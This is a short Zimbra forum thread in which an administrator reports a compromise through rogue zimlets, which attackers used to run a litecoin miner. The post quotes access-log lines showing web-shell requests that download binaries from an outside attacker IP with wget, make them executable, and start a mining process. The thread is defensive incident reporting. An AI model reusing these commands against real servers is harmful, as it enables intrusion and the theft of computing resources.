Results 1 to 3 of 3

Thread: Zimbra Zimlet Exploit Resolution (Litcoin/Bitcoin mining script deployment)

  1. #1
    oneactlife is offline Starter Member
    Join Date
    Mar 2014
    Posts
    2
    Rep Power
    1

    Exclamation Zimbra Zimlet Exploit Resolution (Litcoin/Bitcoin mining script deployment)

    Hi All,

    We have had a never ending issue with Zimbra that started months ago, and after upgrading from 7.2 all the way to 8.0.6 and it appears to still be happening.

    I decided to create a new thread, because the information is segmented and took forever to find. If you are looking for more information these threads led me to the problem:

    Zimbra hack
    zimbra 0-day

    The problem:

    The attacker appears to be able to deploy dummy zimlets that then can be used to write attacking code to the tmp directory and execute this. Although it appears this has only been used to start a litecoin mining process on my server, this is a SEVERE security hole! The attackers could execute bots to read through user messages, the possibilities are endless.

    Of course, we went through the upgrade process to make sure we patched any potential security holes, and double checked our users to make sure there were no other privileged users that could deploy zimlets.

    Using information from the zimbra 0 day thread, we found the found "com_zimbra_example_simplejspaction" and "com_zimbra_example_simplejspaction2" were deployed to the zimlets directory. The first zimlet has been reported, but version "2" has not been mentioned in what I can find. These had older creation dates and appear to be the first zimlets that were causing the problem.

    In looking at the log output in some of the log files in the above threads, I noticed that the command uses chmod to make sure everything is executable. So I scanned the logs:

    Log Folder:
    Code:
    $cd /opt/zimbra/log
    Command:
    Code:
    $cat access_log* | grep chmod
    Output (Our server IP has been redacted):
    Code:
    193.0.202.101 -  -  [11/Mar/2014:04:49:27 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 226 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=wget+http%3A%2F%2F193.0.202.101%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 5
    193.0.202.101 -  -  [11/Mar/2014:04:49:28 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 500 8427 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 51
    193.0.202.101 -  -  [11/Mar/2014:04:49:29 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 6323038
    As you can see the most recent use of the command does not use "com_zimbra_example_simplejspaction" it uses "com_zimbra_email_dns".

    It appears that the various zimlets were deployed prior to 8.0.6 but I am going to keep an eye on things to make sure they are clean.

    Can someone official let us know if the exploit allowing this deployment has been patched? Since we can't get any details on the exploits that are patched, it would be great for my peace of mind.

    Thanks,

    Dustin

  2. #2
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,586
    Rep Power
    57

    Default

    A search of the forums would turn up all the information you need, including this: https://www.zimbra.com/forums/announ...g-84547-a.html
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    oneactlife is offline Starter Member
    Join Date
    Mar 2014
    Posts
    2
    Rep Power
    1

    Default

    Thanks Bill,

    That didn't come up in my initial searches. I appreciate it.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Zimbra - 0day exploit / Privilegie escalation via LFI
    By joelserrano in forum Administrators
    Replies: 5
    Last Post: 01-02-2014, 11:22 AM
  2. How to troubleshoot zimlet deployment ?
    By ychaouche in forum Zimlets
    Replies: 1
    Last Post: 11-28-2012, 03:59 AM
  3. Zimlet deployment failure
    By rd_bhatnagar in forum General Questions
    Replies: 3
    Last Post: 12-22-2009, 04:22 AM
  4. Replies: 2
    Last Post: 03-04-2009, 06:34 PM
  5. Replies: 0
    Last Post: 11-24-2008, 04:25 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •